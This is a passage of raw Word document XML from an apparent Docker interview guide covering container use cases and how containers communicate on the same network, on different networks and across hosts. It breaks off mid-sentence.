          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spinning up a complete development environment using Docker Compose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7604B36E"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developer clones a repo and runs docker-compose up to launch the app with PostgreSQL, Redis, and backend in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D647CB9"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Rapid onboarding and environment consistency across the team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03117F21"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AE94D">
          <v:rect id="_x0000_i3613" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5146D82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5. Software Distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE13E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Distributing pre-configured software or tools in Docker containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AD577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atabases (like MySQL, MongoDB), DevOps tools (like Jenkins, SonarQube) provided as official Docker images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01109A"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No need to install/configure; just pull and run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE6A968"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652894">
          <v:rect id="_x0000_i3614" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFDBCDF"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6. Isolation &amp; Resource Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0743726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applications or services in isolated containers with controlled resource limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4189C16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Hosting multiple apps on a single server with CPU/memory limits per container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCC4A6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revents one app from affecting the performance of others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24502D8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D2AE79">
          <v:rect id="_x0000_i3615" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EFB6D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7. Machine Learning / Data Science Workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31470A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ML models with their environments and dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D768ED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Python ML model using TensorFlow in a Docker container to ensure GPU compatibility and library versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1852168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ortability, reproducibility, and simplified deployment for AI models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20365B9C"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C49C7">
          <v:rect id="_x0000_i3616" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6065361A"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8. Cloud-Native Application Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D979C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Container-based deployment on platforms like AWS, Azure, GCP, or Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2320DA0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ocker images deployed using AWS ECS, EKS, or GKE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E59DEA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Scalable, resilient, and cost-effective cloud-native deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BF2314"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270765">
          <v:rect id="_x0000_i3617" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B18683"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9. Legacy Application Modernization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70823E0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Wrapping legacy apps in Docker containers to make them portable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F92AF3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legacy .NET or Java app running inside a container to avoid re-architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4958C9F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xtends life of legacy apps without major code rewrites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E49D62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539F10">
          <v:rect id="_x0000_i3618" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A9C846"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0. API &amp; Backend Simulation (Mock Servers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0974F62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Spinning up mock APIs or backend services for frontend development/testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67131B8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frontend team using a Dockerized mock backend server during development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6313746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arallel development and faster prototyping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C57914" w14:textId="429B8064"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619" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="193817AD" w14:textId="3F006B07" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="009F2E0D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="895" w:name="_Toc197868109"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>You have 2 containers 1 and 2, can they communicate with each other</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="895"/>
    </w:p>
    <w:p w14:paraId="7740BEDC" w14:textId="1996312B"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es, </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>containers can communicate with each other</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the way they do depends on </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>network configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E6F4C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8235E9">
          <v:rect id="_x0000_i3620" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4893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1: Same Docker Network (Bridge or Custom)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0753BF6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both containers are on the same Docker network</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, they can </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>communicate using container names</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as hostnames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E2DCD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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443DDDD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a custom network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14748FD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my-network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF2C48" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F12A5B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1 on the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B417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1 --network my-network my-image-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BBDEED" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6422B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2 on the same network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18954A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2 --network my-network my-image-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3265951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 inside container1, you can reach container2 via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E16666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ing container2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C637AB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B5B258D">
          <v:rect id="_x0000_i3621" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F66F37A"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2: Different Networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B976F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containers are on different networks, </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>they cannot communicate by default</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You'd have to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAFAFC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nect both containers to a </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common network</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using docker network connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF8071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Or use </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker Compose</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which creates a shared network automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35D3DB"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C805E">
          <v:rect id="_x0000_i3622" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0D36C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Using Docker Compose (Easiest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FA347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automatically connects all defined services in the same custom network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BAEB4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version: '3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE1ECC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ervices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58452ED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app:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7121B4F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my-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527FB3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db:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DD292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postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14806B2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Here, app can reach db with hostname = db.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9C650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957070">
          <v:rect id="_x0000_i3623" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DD9D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Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC780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By default, Docker assigns </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>private IPs</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C53E7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should </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not use IPs directly</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, use </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>container names</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as DNS names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA559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074DCF">
          <v:rect id="_x0000_i3624" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B24D15"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1826"/>
        <w:gridCol w:w="4063"/>
      </w:tblGrid>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="45D83CF5" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0344068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dition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63BC4D0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an Communicate?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49E3DE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Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="19AA9B3B" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13A7628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ame custom Docker network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="177C12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0DD75A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 container name as hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="68F8C947" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4111F3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efault bridge network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68A765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Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78FBA513"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port mapping required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="7CB8EAAE" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B4EA0E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ifferent networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="027F9E4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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74E7D3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eed to connect both to a common network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="3F84AFF9" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D101B1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services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DECCB6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1044EEA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s common network automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44BCA065" w14:textId="5700BF07"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625" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B6DB9" w14:textId="44197480" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="002B7C72">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="896" w:name="_Toc197868110"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If both are with different hosts then whether they will be able to communicate with each other or not</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="896"/>
    </w:p>
    <w:p w14:paraId="6C70B56F" w14:textId="6720D36F" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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two containers are running on different hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, they </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot communicate directly</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Docker's default network setup. However, </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">yes, they </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> communicate</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — but it requires some setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED55F7"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899BC">
          <v:rect id="_x0000_i3626" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E07BB46"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ays to Enable Communication Between Containers on Different Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A83E6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1. Use Public IP or DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566EC4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container A (on Host A)</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wants to talk to </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>container B (on Host B)</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E3B8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Expose container B’s service (e.g., REST API) on a </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
